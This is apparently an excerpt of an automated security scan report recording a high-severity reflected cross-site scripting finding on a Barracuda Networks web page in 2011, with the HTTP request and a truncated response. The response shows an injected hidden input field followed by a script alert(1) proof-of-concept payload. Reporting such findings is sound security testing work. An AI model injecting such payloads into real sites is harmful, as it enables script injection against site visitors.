1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/products/web |
GET /ns/products/web Host: www.barracudanetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 Set-Cookie: locale=+; expires=Sat, 26-Feb-2011 02:19:53 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A1 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 02:28:12 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <input type="hidden" name="40caf"><script>alert(1)< ...[SNIP]... |